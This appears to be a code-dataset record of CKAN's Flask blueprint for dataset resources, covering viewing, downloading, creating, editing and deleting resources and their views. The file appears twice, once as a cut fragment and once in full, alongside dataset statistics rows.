resource = get_action(u'resource_show')(context, {u'id': resource_id})
views = get_action(u'resource_view_list')(
context, {
u'id': resource_id
}
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to read resource %s') % id)
_setup_template_variables(context, {u'id': id}, package_type=package_type)
# TODO: remove
g.pkg_dict = pkg_dict
g.pkg = pkg
g.resource = resource
g.views = views
return base.render(
u'package/resource_views.html', {
u'pkg_dict': pkg_dict,
u'pkg': pkg,
u'resource': resource,
u'views': views
}
)
def view(package_type, id, resource_id, view_id=None):
"""
Embedded page for a resource view.
Depending on the type, different views are loaded. This could be an
img tag where the image is loaded directly or an iframe that embeds a
webpage or a recline preview.
"""
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
package = get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
try:
resource = get_action(u'resource_show')(context, {u'id': resource_id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
view = None
if request.params.get(u'resource_view', u''):
try:
view = json.loads(request.params.get(u'resource_view', u''))
except ValueError:
return base.abort(409, _(u'Bad resource view data'))
elif view_id:
try:
view = get_action(u'resource_view_show')(context, {u'id': view_id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource view not found'))
if not view or not isinstance(view, dict):
return base.abort(404, _(u'Resource view not supplied'))
return h.rendered_resource_view(view, resource, package, embed=True)
# FIXME: could anyone think about better name?
class EditResourceViewView(MethodView):
def _prepare(self, id, resource_id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'for_view': True,
u'auth_user_obj': g.userobj
}
# update resource should tell us early if the user has privilages.
try:
check_access(u'resource_update', context, {u'id': resource_id})
except NotAuthorized:
return base.abort(
403,
_(u'User %r not authorized to edit %s') % (g.user, id)
)
# get resource and package data
try:
pkg_dict = get_action(u'package_show')(context, {u'id': id})
pkg = context[u'package']
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
try:
resource = get_action(u'resource_show')(
context, {
u'id': resource_id
}
)
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
# TODO: remove
g.pkg_dict = pkg_dict
g.pkg = pkg
g.resource = resource
extra_vars = dict(
data={},
errors={},
error_summary={},
view_type=None,
to_preview=False,
pkg_dict=pkg_dict,
pkg=pkg,
resource=resource
)
return context, extra_vars
def post(self, package_type, id, resource_id, view_id=None):
context, extra_vars = self._prepare(id, resource_id)
data = clean_dict(
dict_fns.unflatten(
tuplize_dict(
parse_params(request.form, ignore_keys=CACHE_PARAMETERS)
)
)
)
data.pop(u'save', None)
to_preview = data.pop(u'preview', False)
if to_preview:
context[u'preview'] = True
to_delete = data.pop(u'delete', None)
data[u'resource_id'] = resource_id
data[u'view_type'] = request.args.get(u'view_type')
try:
if to_delete:
data[u'id'] = view_id
get_action(u'resource_view_delete')(context, data)
elif view_id:
data[u'id'] = view_id
data = get_action(u'resource_view_update')(context, data)
else:
data = get_action(u'resource_view_create')(context, data)
except ValidationError as e:
# Could break preview if validation error
to_preview = False
extra_vars[u'errors'] = e.error_dict,
extra_vars[u'error_summary'] = e.error_summary
except NotAuthorized:
# This should never happen unless the user maliciously changed
# the resource_id in the url.
return base.abort(403, _(u'Unauthorized to edit resource'))
else:
if not to_preview:
return h.redirect_to(
u'{}_resource.views'.format(package_type),
id=id, resource_id=resource_id
)
extra_vars[u'data'] = data
extra_vars[u'to_preview'] = to_preview
return self.get(package_type, id, resource_id, view_id, extra_vars)
def get(
self, package_type, id, resource_id, view_id=None, post_extra=None
):
context, extra_vars = self._prepare(id, resource_id)
to_preview = extra_vars[u'to_preview']
if post_extra:
extra_vars.update(post_extra)
package_type = _get_package_type(id)
data = extra_vars[u'data'] if u'data' in extra_vars else None
if data and u'view_type' in data:
view_type = data.get(u'view_type')
else:
view_type = request.args.get(u'view_type')
# view_id exists only when updating
if view_id:
if not data or not view_type:
try:
view_data = get_action(u'resource_view_show')(
context, {
u'id': view_id
}
)
view_type = view_data[u'view_type']
if data:
data.update(view_data)
else:
data = view_data
except (NotFound, NotAuthorized):
return base.abort(404, _(u'View not found'))
# might as well preview when loading good existing view
if not extra_vars[u'errors']:
to_preview = True
data[u'view_type'] = view_type
view_plugin = lib_datapreview.get_view_plugin(view_type)
if not view_plugin:
return base.abort(404, _(u'View Type Not found'))
_setup_template_variables(
context, {u'id': id}, package_type=package_type
)
data_dict = {
u'package': extra_vars[u'pkg_dict'],
u'resource': extra_vars[u'resource'],
u'resource_view': data
}
view_template = view_plugin.view_template(context, data_dict)
form_template = view_plugin.form_template(context, data_dict)
extra_vars.update({
u'form_template': form_template,
u'view_template': view_template,
u'data': data,
u'to_preview': to_preview,
u'datastore_available': plugins.plugin_loaded(u'datastore')
})
extra_vars.update(
view_plugin.setup_template_variables(context, data_dict) or {}
)
extra_vars.update(data_dict)
if view_id:
return base.render(u'package/edit_view.html', extra_vars)
return base.render(u'package/new_view.html', extra_vars)
def _parse_recline_state(params):
state_version = int(request.args.get(u'state_version', u'1'))
if state_version != 1:
return None
recline_state = {}
for k, v in request.args.items():
try:
v = h.json.loads(v)
except ValueError:
pass
recline_state[k] = v
recline_state.pop(u'width', None)
recline_state.pop(u'height', None)
recline_state[u'readOnly'] = True
# previous versions of recline setup used elasticsearch_url attribute
# for data api url - see http://trac.ckan.org/ticket/2639
# fix by relocating this to url attribute which is the default location
if u'dataset' in recline_state and u'elasticsearch_url' in recline_state[
u'dataset'
]:
recline_state[u'dataset'][u'url'] = recline_state[u'dataset'][
u'elasticsearch_url'
]
# Ensure only the currentView is available
# default to grid view if none specified
if not recline_state.get(u'currentView', None):
recline_state[u'currentView'] = u'grid'
for k in recline_state.keys():
if k.startswith(u'view-') and \
not k.endswith(recline_state[u'currentView']):
recline_state.pop(k)
return recline_state
def embedded_dataviewer(package_type, id, resource_id, width=500, height=500):
"""
Embedded page for a read-only resource dataview. Allows
for width and height to be specified as part of the
querystring (as well as accepting them via routes).
"""
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
resource = get_action(u'resource_show')(context, {u'id': resource_id})
package = get_action(u'package_show')(context, {u'id': id})
resource_json = h.json.dumps(resource)
# double check that the resource belongs to the specified package
if not resource[u'id'] in [r[u'id'] for r in package[u'resources']]:
raise NotFound
dataset_type = package[u'type'] or package_type
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
# Construct the recline state
state_version = int(request.args.get(u'state_version', u'1'))
recline_state = _parse_recline_state(request.args)
if recline_state is None:
return base.abort(
400, (
u'"state" parameter must be a valid recline '
u'state (version %d)' % state_version
)
)
recline_state = h.json.dumps(recline_state)
width = max(int(request.args.get(u'width', width)), 100)
height = max(int(request.args.get(u'height', height)), 100)
embedded = True
# TODO: remove
g.resource = resource
g.package = package
g.resource_json = resource_json
g.recline_state = recline_state
g.width = width
g.height = height
g.embedded = embedded
return base.render(
u'package/resource_embedded_dataviewer.html', {
u'dataset_type': dataset_type,
u'resource': resource,
u'package': package,
u'resource_json': resource_json,
u'width': width,
u'height': height,
u'embedded': embedded,
u'recline_state': recline_state
}
)
def datapreview(package_type, id, resource_id):
"""
Embedded page for a resource data-preview.
Depending on the type, different previews are loaded. This could be an
img tag where the image is loaded directly or an iframe that embeds a
webpage, or a recline preview.
"""
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
resource = get_action(u'resource_show')(context, {u'id': resource_id})
package = get_action(u'package_show')(context, {u'id': id})
data_dict = {u'resource': resource, u'package': package}
preview_plugin = lib_datapreview.get_preview_plugin(data_dict)
if preview_plugin is None:
return base.abort(409, _(u'No preview has been defined.'))
preview_plugin.setup_template_variables(context, data_dict)
resource_json = json.dumps(resource)
dataset_type = package[u'type'] or package_type
# TODO: remove
g.resource = resource
g.package = package
g.resource_json = resource_json
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
else:
return base.render(
preview_plugin.preview_template(context, data_dict), {
u'dataset_type': dataset_type,
u'resource': resource,
u'package': package,
u'resource_json': resource_json
}
)
def register_dataset_plugin_rules(blueprint):
blueprint.add_url_rule(u'/new', view_func=CreateView.as_view(str(u'new')))
blueprint.add_url_rule(
u'/<resource_id>', view_func=read, strict_slashes=False)
blueprint.add_url_rule(
u'/<resource_id>/edit', view_func=EditView.as_view(str(u'edit'))
)
blueprint.add_url_rule(
u'/<resource_id>/delete', view_func=DeleteView.as_view(str(u'delete'))
)
blueprint.add_url_rule(u'/<resource_id>/download', view_func=download)
blueprint.add_url_rule(u'/<resource_id>/views', view_func=views)
blueprint.add_url_rule(u'/<resource_id>/view', view_func=view)
blueprint.add_url_rule(u'/<resource_id>/view/<view_id>', view_func=view)
blueprint.add_url_rule(
u'/<resource_id>/download/<filename>', view_func=download
)
_edit_view = EditResourceViewView.as_view(str(u'edit_view'))
blueprint.add_url_rule(u'/<resource_id>/new_view', view_func=_edit_view)
blueprint.add_url_rule(
u'/<resource_id>/edit_view/<view_id>', view_func=_edit_view
)
blueprint.add_url_rule(
u'/<resource_id>/embed', view_func=embedded_dataviewer)
blueprint.add_url_rule(
u'/<resource_id>/viewer',
view_func=embedded_dataviewer,
defaults={
u'width': u"960",
u'height': u"800"
}
)
blueprint.add_url_rule(u'/<resource_id>/preview', view_func=datapreview)
register_dataset_plugin_rules(resource)
register_dataset_plugin_rules(prefixed_resource)
| 33.490256 | 79 | 0.578017 |
import cgi
import json
import logging
import flask
from flask.views import MethodView
import six
import ckan.lib.base as base
import ckan.lib.datapreview as lib_datapreview
import ckan.lib.helpers as h
import ckan.lib.navl.dictization_functions as dict_fns
import ckan.lib.uploader as uploader
import ckan.logic as logic
import ckan.model as model
import ckan.plugins as plugins
from ckan.common import _, g, request
from ckan.views.home import CACHE_PARAMETERS
from ckan.views.dataset import (
_get_pkg_template, _get_package_type, _setup_template_variables
)
Blueprint = flask.Blueprint
NotFound = logic.NotFound
NotAuthorized = logic.NotAuthorized
ValidationError = logic.ValidationError
check_access = logic.check_access
get_action = logic.get_action
tuplize_dict = logic.tuplize_dict
clean_dict = logic.clean_dict
parse_params = logic.parse_params
flatten_to_string_key = logic.flatten_to_string_key
log = logging.getLogger(__name__)
resource = Blueprint(
u'dataset_resource',
__name__,
url_prefix=u'/dataset/<id>/resource',
url_defaults={u'package_type': u'dataset'}
)
prefixed_resource = Blueprint(
u'resource',
__name__,
url_prefix=u'/dataset/<id>/resource',
url_defaults={u'package_type': u'dataset'}
)
def read(package_type, id, resource_id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj,
u'for_view': True
}
try:
package = get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
activity_id = request.params.get(u'activity_id')
if activity_id:
current_pkg = package
try:
package = context['session'].query(model.Activity).get(
activity_id
).data['package']
except AttributeError:
base.abort(404, _(u'Dataset not found'))
if package['id'] != current_pkg['id']:
log.info(u'Mismatch between pkg id in activity and URL {} {}'
.format(package['id'], current_pkg['id']))
# misleading URLs as could be malicious
base.abort(404, _(u'Activity not found'))
# The name is used lots in the template for links, so fix it to be
# the current one. It's not displayed to the user anyway.
package['name'] = current_pkg['name']
# include resources or extras.
package.setdefault(u'resources', [])
resource = None
for res in package.get(u'resources', []):
if res[u'id'] == resource_id:
resource = res
break
if not resource:
return base.abort(404, _(u'Resource not found'))
# get package license info
license_id = package.get(u'license_id')
try:
package[u'isopen'] = model.Package.get_license_register()[license_id
].isopen()
except KeyError:
package[u'isopen'] = False
resource_views = get_action(u'resource_view_list')(
context, {
u'id': resource_id
}
)
resource[u'has_views'] = len(resource_views) > 0
current_resource_view = None
view_id = request.args.get(u'view_id')
if resource[u'has_views']:
if view_id:
current_resource_view = [
rv for rv in resource_views if rv[u'id'] == view_id
]
if len(current_resource_view) == 1:
current_resource_view = current_resource_view[0]
else:
return base.abort(404, _(u'Resource view not found'))
else:
current_resource_view = resource_views[0]
# required for nav menu
pkg = context[u'package']
dataset_type = pkg.type or package_type
# TODO: remove
g.package = package
g.resource = resource
g.pkg = pkg
g.pkg_dict = package
extra_vars = {
u'resource_views': resource_views,
u'current_resource_view': current_resource_view,
u'dataset_type': dataset_type,
u'pkg_dict': package,
u'package': package,
u'resource': resource,
u'pkg': pkg, # NB it is the current version of the dataset, so ignores
# activity_id. Still used though in resource views for
# backward compatibility
u'is_activity_archive': bool(activity_id),
}
template = _get_pkg_template(u'resource_template', dataset_type)
return base.render(template, extra_vars)
def download(package_type, id, resource_id, filename=None):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
rsc = get_action(u'resource_show')(context, {u'id': resource_id})
get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
if rsc.get(u'url_type') == u'upload':
upload = uploader.get_resource_uploader(rsc)
filepath = upload.get_path(rsc[u'id'])
resp = flask.send_file(filepath)
if rsc.get(u'mimetype'):
resp.headers[u'Content-Type'] = rsc[u'mimetype']
return resp
elif u'url' not in rsc:
return base.abort(404, _(u'No download is available'))
return h.redirect_to(rsc[u'url'])
class CreateView(MethodView):
def post(self, package_type, id):
save_action = request.form.get(u'save')
data = clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
)
data.update(clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
))
# we don't want to include save as it is part of the form
del data[u'save']
resource_id = data.pop(u'id')
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
data_provided = False
for key, value in six.iteritems(data):
if (
(value or isinstance(value, cgi.FieldStorage))
and key != u'resource_type'):
data_provided = True
break
if not data_provided and save_action != u"go-dataset-complete":
if save_action == u'go-dataset':
return h.redirect_to(u'{}.edit'.format(package_type), id=id)
try:
data_dict = get_action(u'package_show')(context, {u'id': id})
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to update dataset'))
except NotFound:
return base.abort(
404,
_(u'The dataset {id} could not be found.').format(id=id)
)
if not len(data_dict[u'resources']):
msg = _(u'You must add at least one data resource')
errors = {}
error_summary = {_(u'Error'): msg}
return self.get(package_type, id, data, errors, error_summary)
data_dict = get_action(u'package_show')(context, {u'id': id})
get_action(u'package_update')(
dict(context, allow_state_change=True),
dict(data_dict, state=u'active')
)
return h.redirect_to(u'{}.read'.format(package_type), id=id)
data[u'package_id'] = id
try:
if resource_id:
data[u'id'] = resource_id
get_action(u'resource_update')(context, data)
else:
get_action(u'resource_create')(context, data)
except ValidationError as e:
errors = e.error_dict
error_summary = e.error_summary
if data.get(u'url_type') == u'upload' and data.get(u'url'):
data[u'url'] = u''
data[u'url_type'] = u''
data[u'previous_upload'] = True
return self.get(package_type, id, data, errors, error_summary)
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to create a resource'))
except NotFound:
return base.abort(
404, _(u'The dataset {id} could not be found.').format(id=id)
)
if save_action == u'go-metadata':
data_dict = get_action(u'package_show')(context, {u'id': id})
get_action(u'package_update')(
dict(context, allow_state_change=True),
dict(data_dict, state=u'active')
)
return h.redirect_to(u'{}.read'.format(package_type), id=id)
elif save_action == u'go-dataset':
return h.redirect_to(u'{}.edit'.format(package_type), id=id)
elif save_action == u'go-dataset-complete':
return h.redirect_to(u'{}.read'.format(package_type), id=id)
else:
return h.redirect_to(
u'{}_resource.new'.format(package_type),
id=id
)
def get(
self, package_type, id, data=None, errors=None, error_summary=None
):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
pkg_dict = get_action(u'package_show')(context, {u'id': id})
except NotFound:
return base.abort(
404, _(u'The dataset {id} could not be found.').format(id=id)
)
try:
check_access(
u'resource_create', context, {u"package_id": pkg_dict["id"]}
)
except NotAuthorized:
return base.abort(
403, _(u'Unauthorized to create a resource for this package')
)
package_type = pkg_dict[u'type'] or package_type
errors = errors or {}
error_summary = error_summary or {}
extra_vars = {
u'data': data,
u'errors': errors,
u'error_summary': error_summary,
u'action': u'new',
u'resource_form_snippet': _get_pkg_template(
u'resource_form', package_type
),
u'dataset_type': package_type,
u'pkg_name': id,
u'pkg_dict': pkg_dict
}
template = u'package/new_resource_not_draft.html'
if pkg_dict[u'state'].startswith(u'draft'):
extra_vars[u'stage'] = ['complete', u'active']
template = u'package/new_resource.html'
return base.render(template, extra_vars)
class EditView(MethodView):
def _prepare(self, id):
context = {
u'model': model,
u'session': model.Session,
u'api_version': 3,
u'for_edit': True,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
check_access(u'package_update', context, {u'id': id})
except NotAuthorized:
return base.abort(
403,
_(u'User %r not authorized to edit %s') % (g.user, id)
)
return context
def post(self, package_type, id, resource_id):
context = self._prepare(id)
data = clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
)
data.update(clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
))
del data[u'save']
data[u'package_id'] = id
try:
if resource_id:
data[u'id'] = resource_id
get_action(u'resource_update')(context, data)
else:
get_action(u'resource_create')(context, data)
except ValidationError as e:
errors = e.error_dict
error_summary = e.error_summary
return self.get(
package_type, id, resource_id, data, errors, error_summary
)
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to edit this resource'))
return h.redirect_to(
u'{}_resource.read'.format(package_type),
id=id, resource_id=resource_id
)
def get(
self,
package_type,
id,
resource_id,
data=None,
errors=None,
error_summary=None
):
context = self._prepare(id)
pkg_dict = get_action(u'package_show')(context, {u'id': id})
try:
resource_dict = get_action(u'resource_show')(
context, {
u'id': resource_id
}
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
if pkg_dict[u'state'].startswith(u'draft'):
return CreateView().get(package_type, id, data=resource_dict)
# resource is fully created
resource = resource_dict
# set the form action
form_action = h.url_for(
u'{}_resource.edit'.format(package_type),
resource_id=resource_id, id=id
)
if not data:
data = resource_dict
package_type = pkg_dict[u'type'] or package_type
errors = errors or {}
error_summary = error_summary or {}
extra_vars = {
u'data': data,
u'errors': errors,
u'error_summary': error_summary,
u'action': u'edit',
u'resource_form_snippet': _get_pkg_template(
u'resource_form', package_type
),
u'dataset_type': package_type,
u'resource': resource,
u'pkg_dict': pkg_dict,
u'form_action': form_action
}
return base.render(u'package/resource_edit.html', extra_vars)
class DeleteView(MethodView):
def _prepare(self, id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
check_access(u'package_delete', context, {u'id': id})
except NotAuthorized:
return base.abort(
403,
_(u'Unauthorized to delete package %s') % u''
)
return context
def post(self, package_type, id, resource_id):
if u'cancel' in request.form:
return h.redirect_to(
u'{}_resource.edit'.format(package_type),
resource_id=resource_id, id=id
)
context = self._prepare(id)
try:
get_action(u'resource_delete')(context, {u'id': resource_id})
h.flash_notice(_(u'Resource has been deleted.'))
pkg_dict = get_action(u'package_show')(None, {u'id': id})
if pkg_dict[u'state'].startswith(u'draft'):
return h.redirect_to(
u'{}_resource.new'.format(package_type),
id=id
)
else:
return h.redirect_to(u'{}.read'.format(package_type), id=id)
except NotAuthorized:
return base.abort(
403,
_(u'Unauthorized to delete resource %s') % u''
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
def get(self, package_type, id, resource_id):
context = self._prepare(id)
try:
resource_dict = get_action(u'resource_show')(
context, {
u'id': resource_id
}
)
pkg_id = id
except NotAuthorized:
return base.abort(
403,
_(u'Unauthorized to delete resource %s') % u''
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
# TODO: remove
g.resource_dict = resource_dict
g.pkg_id = pkg_id
return base.render(
u'package/confirm_delete_resource.html', {
u'dataset_type': _get_package_type(id),
u'resource_dict': resource_dict,
u'pkg_id': pkg_id
}
)
def views(package_type, id, resource_id):
package_type = _get_package_type(id)
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'for_view': True,
u'auth_user_obj': g.userobj
}
data_dict = {u'id': id}
try:
check_access(u'package_update', context, data_dict)
except NotAuthorized:
return base.abort(
403,
_(u'User %r not authorized to edit %s') % (g.user, id)
)
# check if package exists
try:
pkg_dict = get_action(u'package_show')(context, data_dict)
pkg = context[u'package']
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
try:
resource = get_action(u'resource_show')(context, {u'id': resource_id})
views = get_action(u'resource_view_list')(
context, {
u'id': resource_id
}
)
except NotFound:
return base.abort(404, _(u'Resource not found'))
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to read resource %s') % id)
_setup_template_variables(context, {u'id': id}, package_type=package_type)
# TODO: remove
g.pkg_dict = pkg_dict
g.pkg = pkg
g.resource = resource
g.views = views
return base.render(
u'package/resource_views.html', {
u'pkg_dict': pkg_dict,
u'pkg': pkg,
u'resource': resource,
u'views': views
}
)
def view(package_type, id, resource_id, view_id=None):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
package = get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
try:
resource = get_action(u'resource_show')(context, {u'id': resource_id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
view = None
if request.params.get(u'resource_view', u''):
try:
view = json.loads(request.params.get(u'resource_view', u''))
except ValueError:
return base.abort(409, _(u'Bad resource view data'))
elif view_id:
try:
view = get_action(u'resource_view_show')(context, {u'id': view_id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource view not found'))
if not view or not isinstance(view, dict):
return base.abort(404, _(u'Resource view not supplied'))
return h.rendered_resource_view(view, resource, package, embed=True)
# FIXME: could anyone think about better name?
class EditResourceViewView(MethodView):
def _prepare(self, id, resource_id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'for_view': True,
u'auth_user_obj': g.userobj
}
# update resource should tell us early if the user has privilages.
try:
check_access(u'resource_update', context, {u'id': resource_id})
except NotAuthorized:
return base.abort(
403,
_(u'User %r not authorized to edit %s') % (g.user, id)
)
# get resource and package data
try:
pkg_dict = get_action(u'package_show')(context, {u'id': id})
pkg = context[u'package']
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Dataset not found'))
try:
resource = get_action(u'resource_show')(
context, {
u'id': resource_id
}
)
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
# TODO: remove
g.pkg_dict = pkg_dict
g.pkg = pkg
g.resource = resource
extra_vars = dict(
data={},
errors={},
error_summary={},
view_type=None,
to_preview=False,
pkg_dict=pkg_dict,
pkg=pkg,
resource=resource
)
return context, extra_vars
def post(self, package_type, id, resource_id, view_id=None):
context, extra_vars = self._prepare(id, resource_id)
data = clean_dict(
dict_fns.unflatten(
tuplize_dict(
parse_params(request.form, ignore_keys=CACHE_PARAMETERS)
)
)
)
data.pop(u'save', None)
to_preview = data.pop(u'preview', False)
if to_preview:
context[u'preview'] = True
to_delete = data.pop(u'delete', None)
data[u'resource_id'] = resource_id
data[u'view_type'] = request.args.get(u'view_type')
try:
if to_delete:
data[u'id'] = view_id
get_action(u'resource_view_delete')(context, data)
elif view_id:
data[u'id'] = view_id
data = get_action(u'resource_view_update')(context, data)
else:
data = get_action(u'resource_view_create')(context, data)
except ValidationError as e:
# Could break preview if validation error
to_preview = False
extra_vars[u'errors'] = e.error_dict,
extra_vars[u'error_summary'] = e.error_summary
except NotAuthorized:
# This should never happen unless the user maliciously changed
# the resource_id in the url.
return base.abort(403, _(u'Unauthorized to edit resource'))
else:
if not to_preview:
return h.redirect_to(
u'{}_resource.views'.format(package_type),
id=id, resource_id=resource_id
)
extra_vars[u'data'] = data
extra_vars[u'to_preview'] = to_preview
return self.get(package_type, id, resource_id, view_id, extra_vars)
def get(
self, package_type, id, resource_id, view_id=None, post_extra=None
):
context, extra_vars = self._prepare(id, resource_id)
to_preview = extra_vars[u'to_preview']
if post_extra:
extra_vars.update(post_extra)
package_type = _get_package_type(id)
data = extra_vars[u'data'] if u'data' in extra_vars else None
if data and u'view_type' in data:
view_type = data.get(u'view_type')
else:
view_type = request.args.get(u'view_type')
# view_id exists only when updating
if view_id:
if not data or not view_type:
try:
view_data = get_action(u'resource_view_show')(
context, {
u'id': view_id
}
)
view_type = view_data[u'view_type']
if data:
data.update(view_data)
else:
data = view_data
except (NotFound, NotAuthorized):
return base.abort(404, _(u'View not found'))
# might as well preview when loading good existing view
if not extra_vars[u'errors']:
to_preview = True
data[u'view_type'] = view_type
view_plugin = lib_datapreview.get_view_plugin(view_type)
if not view_plugin:
return base.abort(404, _(u'View Type Not found'))
_setup_template_variables(
context, {u'id': id}, package_type=package_type
)
data_dict = {
u'package': extra_vars[u'pkg_dict'],
u'resource': extra_vars[u'resource'],
u'resource_view': data
}
view_template = view_plugin.view_template(context, data_dict)
form_template = view_plugin.form_template(context, data_dict)
extra_vars.update({
u'form_template': form_template,
u'view_template': view_template,
u'data': data,
u'to_preview': to_preview,
u'datastore_available': plugins.plugin_loaded(u'datastore')
})
extra_vars.update(
view_plugin.setup_template_variables(context, data_dict) or {}
)
extra_vars.update(data_dict)
if view_id:
return base.render(u'package/edit_view.html', extra_vars)
return base.render(u'package/new_view.html', extra_vars)
def _parse_recline_state(params):
state_version = int(request.args.get(u'state_version', u'1'))
if state_version != 1:
return None
recline_state = {}
for k, v in request.args.items():
try:
v = h.json.loads(v)
except ValueError:
pass
recline_state[k] = v
recline_state.pop(u'width', None)
recline_state.pop(u'height', None)
recline_state[u'readOnly'] = True
# previous versions of recline setup used elasticsearch_url attribute
# for data api url - see http://trac.ckan.org/ticket/2639
# fix by relocating this to url attribute which is the default location
if u'dataset' in recline_state and u'elasticsearch_url' in recline_state[
u'dataset'
]:
recline_state[u'dataset'][u'url'] = recline_state[u'dataset'][
u'elasticsearch_url'
]
# Ensure only the currentView is available
# default to grid view if none specified
if not recline_state.get(u'currentView', None):
recline_state[u'currentView'] = u'grid'
for k in recline_state.keys():
if k.startswith(u'view-') and \
not k.endswith(recline_state[u'currentView']):
recline_state.pop(k)
return recline_state
def embedded_dataviewer(package_type, id, resource_id, width=500, height=500):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
resource = get_action(u'resource_show')(context, {u'id': resource_id})
package = get_action(u'package_show')(context, {u'id': id})
resource_json = h.json.dumps(resource)
# double check that the resource belongs to the specified package
if not resource[u'id'] in [r[u'id'] for r in package[u'resources']]:
raise NotFound
dataset_type = package[u'type'] or package_type
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
# Construct the recline state
state_version = int(request.args.get(u'state_version', u'1'))
recline_state = _parse_recline_state(request.args)
if recline_state is None:
return base.abort(
400, (
u'"state" parameter must be a valid recline '
u'state (version %d)' % state_version
)
)
recline_state = h.json.dumps(recline_state)
width = max(int(request.args.get(u'width', width)), 100)
height = max(int(request.args.get(u'height', height)), 100)
embedded = True
# TODO: remove
g.resource = resource
g.package = package
g.resource_json = resource_json
g.recline_state = recline_state
g.width = width
g.height = height
g.embedded = embedded
return base.render(
u'package/resource_embedded_dataviewer.html', {
u'dataset_type': dataset_type,
u'resource': resource,
u'package': package,
u'resource_json': resource_json,
u'width': width,
u'height': height,
u'embedded': embedded,
u'recline_state': recline_state
}
)
def datapreview(package_type, id, resource_id):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
resource = get_action(u'resource_show')(context, {u'id': resource_id})
package = get_action(u'package_show')(context, {u'id': id})
data_dict = {u'resource': resource, u'package': package}
preview_plugin = lib_datapreview.get_preview_plugin(data_dict)
if preview_plugin is None:
return base.abort(409, _(u'No preview has been defined.'))
preview_plugin.setup_template_variables(context, data_dict)
resource_json = json.dumps(resource)
dataset_type = package[u'type'] or package_type
# TODO: remove
g.resource = resource
g.package = package
g.resource_json = resource_json
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
else:
return base.render(
preview_plugin.preview_template(context, data_dict), {
u'dataset_type': dataset_type,
u'resource': resource,
u'package': package,
u'resource_json': resource_json
}
)
def register_dataset_plugin_rules(blueprint):
blueprint.add_url_rule(u'/new', view_func=CreateView.as_view(str(u'new')))
blueprint.add_url_rule(
u'/<resource_id>', view_func=read, strict_slashes=False)
blueprint.add_url_rule(
u'/<resource_id>/edit', view_func=EditView.as_view(str(u'edit'))
)
blueprint.add_url_rule(
u'/<resource_id>/delete', view_func=DeleteView.as_view(str(u'delete'))
)
blueprint.add_url_rule(u'/<resource_id>/download', view_func=download)
blueprint.add_url_rule(u'/<resource_id>/views', view_func=views)
blueprint.add_url_rule(u'/<resource_id>/view', view_func=view)
blueprint.add_url_rule(u'/<resource_id>/view/<view_id>', view_func=view)
blueprint.add_url_rule(
u'/<resource_id>/download/<filename>', view_func=download
)
_edit_view = EditResourceViewView.as_view(str(u'edit_view'))
blueprint.add_url_rule(u'/<resource_id>/new_view', view_func=_edit_view)
blueprint.add_url_rule(
u'/<resource_id>/edit_view/<view_id>', view_func=_edit_view
)
blueprint.add_url_rule(
u'/<resource_id>/embed', view_func=embedded_dataviewer)
blueprint.add_url_rule(
u'/<resource_id>/viewer',
view_func=embedded_dataviewer,
defaults={
u'width': u"960",
u'height': u"800"
}
)
blueprint.add_url_rule(u'/<resource_id>/preview', view_func=datapreview)
register_dataset_plugin_rules(resource)
register_dataset_plugin_rules(prefixed_resource)
| true | true |
1c3333803a99fbaa0e4a9b9243428d076cd7b431 | 5,362 | py | Python | discord/template.py | jonasbohmann/discord.py | a63ced9c6910b92acc06e6c0d9f50f1ce495b18b | [
"MIT"
